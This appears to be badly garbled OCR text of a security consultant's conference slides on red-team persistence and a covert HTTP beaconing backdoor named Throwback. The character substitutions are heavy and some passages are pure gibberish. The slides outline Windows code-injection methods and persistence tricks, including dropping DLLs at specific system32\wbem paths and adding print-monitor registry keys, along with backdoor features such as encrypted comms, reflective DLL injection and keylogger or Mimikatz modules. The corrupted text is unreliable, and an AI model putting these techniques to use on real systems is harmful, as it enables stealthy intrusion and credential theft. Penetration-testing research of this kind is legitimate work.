8rady 8loxham lounder/rlnclpal SecurlLy ConsulLanL [sllenLbreaksec hup://www.sllenLbreaksecurlLy.com hup://www.blacksqulrrel.lo 6078%9*:$) ShorLen Lhe gap beLween peneLrauon LesL and acLual auack lew coverL perslsLence Lools 8educe rellance on MeLasplolL !*- 0 /*- -* 7*;"9 uLL ln[ecuon erslsLence 1hrowback LoLs of demos along Lhe way <== 3$>"7?*$ 1radluonal meLhods CreaLe8emoLe1hread() nLCreaLe1hreadLx() 8LlCreaLeuser1hread() nLCueueApc1hread () Can blue screen cerLaln CSes Code Cave Suspend process ln[ecL code Change Ll Lo locauon of ln[ecLed code 8esume process ulmculL on x64 @))A*$(-*9BC + ln[ecLs lnLo spoolsv.exe uoesn'L requlre maLchlng archlLecLure Lasy Lo use - ull musL be on dlsk 8equlres admlnlsLraLor prlvs <// 3$>"7?*$ <"D* ."9,(,-"$7" LoLs of perslsLence ln Wlndows Servlce 8un keys SchLasks . And loLs sull Lo nd. LoLs of Lechnlques rocess monlLor Pook LoadLlbrary() ."9,(,-"$7" 1 sL 1echnlque 8equlres vMware 1ools be lnsLalled !usL drop a dll Lo dlsk c:\wlndows\sysLem32\wbem\nLdsapl.dll noLe: ull musL exporL same funcuons as real nLdsapl.dll 2 nd 1echnlque vMware paLched ln LSxl 3.3 8equlres vMware 1ools be lnsLalled !usL drop a dll Lo dlsk c:\wlndows\sysLem32\wbem\Lpgenllc.dll c:\wlndows\sysLem32\wbem\Lhlnmon.dll !"#$%&' ."9,(,-"$7" 3 rd 1echnlque PkLM\S?S1LM\CurrenLConLrolSeL\ConLrol\rlnL\MonlLors\ CreaLe a new key CreaLe a new value named urlver wlLh Lhe dll name CreaLe as many as you llke ."9,(,-"$7" <"D* '($)*+, @.3 EFF. G2"0-,2""- WlnP11 lnLended for servlces uoes noL pull user proxy semngs SupporLs lmpersonauon WlnlneL More robusL ln proxy envlronmenL varleLy of ags LhaL enable/dlsable funcuonallLy auLomaucally rompLs user for password lf auLhenucauon ls requlred uses lL semngs '20- (, F29*+H078I C++ P11/S beaconlng backdoor P conLrol panel w/ MySCL backend 8ullL for sLealLh erslsLence bullL-ln ull Lxe !"#$%&$' )*$+
,+-./ 0 12+$3455 67+-384%9:, ;&&4%9$+ 67+-384%9:, F29*+H078 J"0-:9", 8obusL proxy deLecuon ulsLrlbuLed Ls uses MSC8C Lo generaLe MSl payloads 8C4 encrypLed comms lmplemenLs reecuve dll ln[ecuon SLrlng encrypuon F29*+H078 F29*+H078 <"D* !*($% J*9+09)K CommunlLy based pro[ecL!!! CreaLe modules keylogger, MlmlkaLz, Pashdump, eLc. varlous LransporL meLhods Addluonal perslsLence Lechnlques Modlcauon of comms F2" L$) M20D"/",, ./:% lnLeresLed ln wrlung cusLom malware/backdoors? uark Slde Cps: CusLom eneLrauon 1esung 8lackhaL Lurope and LasL CoasL 1ralnlngs en LesL neLworks from your browser hups://www.blacksqulrrel.lo
SllenL 8reak SecurlLy 8lackbox/8ed 1eam en 1esung brady[sllenLbreaksecurlLy.com [sllenLbreaksec hups://glLhub.com/sllenLbreaksec